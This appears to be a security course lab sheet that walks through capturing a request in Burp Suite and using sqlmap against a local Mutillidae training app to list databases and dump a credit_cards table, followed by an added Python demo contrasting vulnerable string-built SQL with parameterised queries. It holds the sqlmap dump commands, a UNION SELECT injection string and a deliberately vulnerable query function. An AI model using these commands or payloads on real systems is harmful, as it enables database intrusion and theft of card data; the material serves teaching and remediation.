Lesson 8 Lab Notes

In this lab we will do the following:
  • Use sqlmap to automate SQL injection.
  • Exploit the Mutillidae database.
  • Grab the sensitive information stored in the database.

CVE Information:

N/A

Module Information:

N/A

Instructions:

Browse to http://172.16.56.2/mutillidae/

Select OWASP Top 10 > A1 - Injection > SQLMAP Target Practice > View Someone's Blog

In Firefox, go to Preferences > Advanced > Network > Settings > Manual proxy configuration and use localhost:8080 as your proxy.

Launch Burp Suite.

Go to Proxy > Intercept and make sure you see 'Intercept is on'.

Copy the request by using CTRL + A.

Open a terminal and type gedit /root/sqlmap.request

Paste the request from Burp Suite into the text editor, then save and close. Type the following at the terminal:

sqlmap -r /root/sqlmap.request --threads=2 --dbs

sqlmap -r /root/sqlmap.request --threads=2 -D owasp10 --tables

sqlmap -r /root/sqlmap.request --threads=2 -D owasp10 -T credit_cards --dump
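
Why the dump above succeeds, and the fix that stops it, shown as an added example (not part of the original lab and not Mutillidae's code). The table layout, column names, function names and the crafted input are constructed stand-ins for illustration.

```python
import sqlite3

def build_db():
    """Constructed in-memory stand-in for the lab database (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE blogs (author TEXT, entry TEXT);
        CREATE TABLE credit_cards (ccnumber TEXT, expiration TEXT);
        INSERT INTO blogs VALUES ('alice', 'First post'), ('bob', 'Hello');
        INSERT INTO credit_cards VALUES ('0000-0000-0000-0001', '01/30');
    """)
    return db

def view_blog_concat(db, author):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so a quote in the value ends the string literal and the rest runs as SQL.
    sql = "SELECT author, entry FROM blogs WHERE author = '" + author + "'"
    return db.execute(sql).fetchall()

def view_blog_param(db, author):
    # Hardened form: the value is bound as data and the statement text is fixed,
    # so the same input is only ever compared against the author column.
    sql = "SELECT author, entry FROM blogs WHERE author = ?"
    return db.execute(sql, (author,)).fetchall()

# Constructed input of the kind an automated injection test submits.
CRAFTED = "x' UNION SELECT ccnumber, expiration FROM credit_cards --"

if __name__ == "__main__":
    db = build_db()
    print("concat, normal :", view_blog_concat(db, "alice"))
    print("concat, crafted:", view_blog_concat(db, CRAFTED))  # rows from credit_cards
    print("param,  normal :", view_blog_param(db, "alice"))
    print("param,  crafted:", view_blog_param(db, CRAFTED))   # no rows
```

With the bound parameter the crafted value matches no author and the credit_cards table is never read, which is the behaviour to verify after remediating the page targeted in this lab.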
